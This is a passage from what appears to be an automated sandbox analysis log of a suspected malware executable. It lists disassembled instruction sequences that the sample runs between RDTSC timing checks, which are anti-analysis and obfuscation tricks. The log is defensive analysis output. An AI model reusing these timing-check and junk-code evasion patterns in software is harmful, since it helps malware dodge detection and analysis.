ptr [ebp+122D1ADCh], eax 0x0000005c push 00000000h 0x0000005e movzx edi, cx 0x00000061 push 00000003h 0x00000063 call 00007FC9F53DFD59h 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FC9F53DFD64h 0x00000071 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93D6C second address: C93D72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93D72 second address: C93D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC9F53DFD56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93D7C second address: C93D9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9F53C6A84h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93D9C second address: C93DCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC9F53DFD69h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93DCA second address: C93DE8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC9F53C6A80h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93DE8 second address: C93DEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C93DEE second address: C93E3E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC9F53C6A78h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007FC9F53C6A86h 0x00000015 pop eax 0x00000016 jp 00007FC9F53C6A7Bh 0x0000001c mov ecx, 674DC33Fh 0x00000021 lea ebx, dword ptr [ebp+12458704h] 0x00000027 jnc 00007FC9F53C6A79h 0x0000002d xchg eax, ebx 0x0000002e jp 00007FC9F53C6A84h 0x00000034 push eax 0x00000035 push edx 0x00000036 ja 00007FC9F53C6A76h 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C868BF second address: C868C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C868C4 second address: C868CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C868CC second address: C868D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB17E8 second address: CB180A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FC9F53C6A7Fh 0x00000010 jns 00007FC9F53C6A76h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB180A second address: CB1824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FC9F53DFD62h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB1824 second address: CB182C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB182C second address: CB1842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FC9F53DFD5Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB1842 second address: CB184F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FC9F53C6A90h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB1C90 second address: CB1C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB1DAF second address: CB1DB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB1DB5 second address: CB1DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB2079 second address: CB2083 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB2083 second address: CB2089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB2089 second address: CB208D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB21E5 second address: CB21EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB21EB second address: CB2205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007FC9F53C6A76h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB267A second address: CB2680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB2680 second address: CB2699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007FC9F53C6A7Ch 0x0000000b je 00007FC9F53C6A7Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CAAD13 second address: CAAD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 push edx 0x00000007 jmp 00007FC9F53DFD61h 0x0000000c pushad 0x0000000d jmp 00007FC9F53DFD5Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB29DD second address: CB29E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB29E5 second address: CB2A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC9F53DFD56h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FC9F53DFD58h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB2A01 second address: CB2A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB3291 second address: CB32A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC9F53DFD63h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB73FC second address: CB7408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC9F53C6A76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB7408 second address: CB7411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB7411 second address: CB7415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB7415 second address: CB7419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB889A second address: CB889F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB889F second address: CB88D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53DFD67h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC9F53DFD5Ah 0x00000016 push esi 0x00000017 pop esi 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB88D1 second address: CB88DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC9F53C6A76h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CB88DE second address: CB88E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CBC45D second address: CBC461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CBC6A5 second address: CBC6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CBC6A9 second address: CBC6AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CBC6AF second address: CBC6C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FC9F53DFD56h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC19EE second address: CC1A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FC9F53C6A81h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC2242 second address: CC2246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC23A6 second address: CC23AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC23AC second address: CC23B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC23B2 second address: CC2408 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FC9F53C6A86h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FC9F53C6A85h 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 js 00007FC9F53C6A97h 0x0000001a jmp 00007FC9F53C6A83h 0x0000001f push eax 0x00000020 push edx 0x00000021 jbe 00007FC9F53C6A76h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC427F second address: CC4284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC4284 second address: CC4289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC4289 second address: CC428F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC428F second address: CC4308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007FC9F53C6A7Ch 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jnl 00007FC9F53C6A84h 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007FC9F53C6A87h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 jnp 00007FC9F53C6A78h 0x0000002b pushad 0x0000002c popad 0x0000002d push ebx 0x0000002e pushad 0x0000002f popad 0x00000030 pop ebx 0x00000031 popad 0x00000032 pop eax 0x00000033 call 00007FC9F53C6A79h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC9F53C6A84h 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC4308 second address: CC4324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD68h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC4324 second address: CC4332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC4332 second address: CC4337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC46CC second address: CC46DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FC9F53C6A84h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC4990 second address: CC49A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC9F53DFD56h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC4F3F second address: CC4F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC4F45 second address: CC4F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC4F49 second address: CC4FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007FC9F53C6A81h 0x0000000f jmp 00007FC9F53C6A7Bh 0x00000014 xchg eax, ebx 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FC9F53C6A78h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f pushad 0x00000030 mov dword ptr [ebp+122D1B7Bh], esi 0x00000036 push edi 0x00000037 jmp 00007FC9F53C6A84h 0x0000003c pop esi 0x0000003d popad 0x0000003e nop 0x0000003f push esi 0x00000040 jc 00007FC9F53C6A78h 0x00000046 pushad 0x00000047 popad 0x00000048 pop esi 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FC9F53C6A80h 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC4FC2 second address: CC4FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC9F53DFD56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC5599 second address: CC559D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC5A64 second address: CC5A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC5A68 second address: CC5A6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC5A6E second address: CC5A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC635C second address: CC6362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC804E second address: CC80D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC9F53DFD61h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007FC9F53DFD64h 0x00000012 nop 0x00000013 jmp 00007FC9F53DFD64h 0x00000018 xor edi, dword ptr [ebp+122D364Bh] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FC9F53DFD58h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a jmp 00007FC9F53DFD5Ah 0x0000003f push 00000000h 0x00000041 mov si, cx 0x00000044 xchg eax, ebx 0x00000045 jbe 00007FC9F53DFD5Ah 0x0000004b push ebx 0x0000004c pushad 0x0000004d popad 0x0000004e pop ebx 0x0000004f push eax 0x00000050 pushad 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC970B second address: CC970F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC970F second address: CC9713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CCAD07 second address: CCAD1A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9F53C6A78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CCD7E5 second address: CCD800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD0955 second address: CD09AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FC9F53C6A78h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push 00000000h 0x00000025 xor dword ptr [ebp+122D1991h], ebx 0x0000002b mov dword ptr [ebp+12458A75h], eax 0x00000031 push 00000000h 0x00000033 mov ebx, dword ptr [ebp+122D2CE6h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC9F53C6A83h 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CCC888 second address: CCC88E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CCC969 second address: CCC96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CCDA5B second address: CCDA72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD63h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CCDA72 second address: CCDA92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9F53C6A84h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CCDA92 second address: CCDA9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CCE928 second address: CCE92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD1B03 second address: CD1B0D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC9F53DFD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CCF9F6 second address: CCFA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FC9F53C6A78h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a cld 0x0000002b mov ebx, 0023F7D2h 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007FC9F53C6A78h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 mov ebx, dword ptr [ebp+122D3753h] 0x00000057 cld 0x00000058 mov eax, dword ptr [ebp+122D045Dh] 0x0000005e mov di, 8F34h 0x00000062 push FFFFFFFFh 0x00000064 jmp 00007FC9F53C6A86h 0x00000069 nop 0x0000006a push edi 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
